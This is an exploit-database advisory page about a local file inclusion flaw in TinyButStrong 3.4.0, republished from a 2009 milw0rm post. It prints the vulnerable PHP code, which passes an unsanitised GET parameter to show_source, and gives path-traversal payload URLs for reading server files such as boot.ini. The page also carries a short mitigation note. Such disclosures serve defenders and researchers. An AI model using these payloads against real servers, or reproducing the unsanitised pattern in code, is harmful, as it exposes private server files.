header-logo
Suggest Exploit
vendor:
TinyButStrong
by:
ahmadbady
7,5
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: TinyButStrong
Affected Version From: 3.4.0
Affected Version To: 3.4.0
Patch Exists: NO
Related CWE: N/A
CPE: a:tinybutstrong:tinybutstrong:3.4.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: All
2020

TinyButStrong version 3.4.0

TinyButStrong version 3.4.0 is vulnerable to Local File Inclusion vulnerability. An attacker can exploit this vulnerability by sending a crafted HTTP request with a malicious script parameter to the vulnerable application. This will allow the attacker to read the content of any local file on the server.

Mitigation:

The best way to mitigate this vulnerability is to restrict access to the vulnerable application and to ensure that all user input is properly sanitized and validated.
Source

Exploit-DB raw data:

                              (  ' )-.          ,~'`-.
                                       ,~' `  ' ) )       _(   _) )
                                      ( ( .--.===.--.    (  `    ' )
                                       `.%%.      .#`.   `-'`~~=~'
                                       /%%/         \##\
                                      |%%/  local    \##|
                                      |%%|           |##|.,-.
                                      \%%|  file     |##/    )_
                                       \%\           /#/ ( `'  )
                                        \%\ include /#/(  ,  -'`-.
                                    ,~-. `%\       /#'(  (     ') )
                                   (  ) )_ `\__|__/'   `~-~=--~~='
                                  ( ` ')  ) [-=-=-]
                                 (_(_.~~~'   \|_|/ 
                                             [***]
                              \|||/
                              (o o) 
-=-=-=-==-=-=-=-=-=-=-=+-oooO--(_)-------+-=-=-=-=-=-=-   
                       |                 |    
                       |                 |                                      

script:TinyButStrong version 3.4.0
-------------------------------------------------
Author: ahmadbady 
email: kivi_hacker666@yahoo.com
my site:Coming Soon
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-====-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
download from:http://www.tinybutstrong.com/download/download.php?file=tbs_us.zip&sid=2

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=--=-=--=
vul:/examples/tbs_us_examples_0view.php

<?php
if (!isset($_GET)) $_GET=&$HTTP_GET_VARS ;
show_source('tbs_us_examples_'.$_GET['script']) ;
exit ;
?>

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-
xpl:

path/examples/tbs_us_examples_0view.php?script=../../../../boot.ini

path/examples/tbs_us_examples_0view.php?script=[local_file]
-=-=-=-=-=-=-=-=-=-=-=-+------------Ooo--+-=-=-=-=-=-=-=-=-=-=-=-=-        
                            |__|__|
                             || ||
                             OoO OoO

# milw0rm.com [2009-05-13]

Navigation

Suggest Exploit

Services By CQR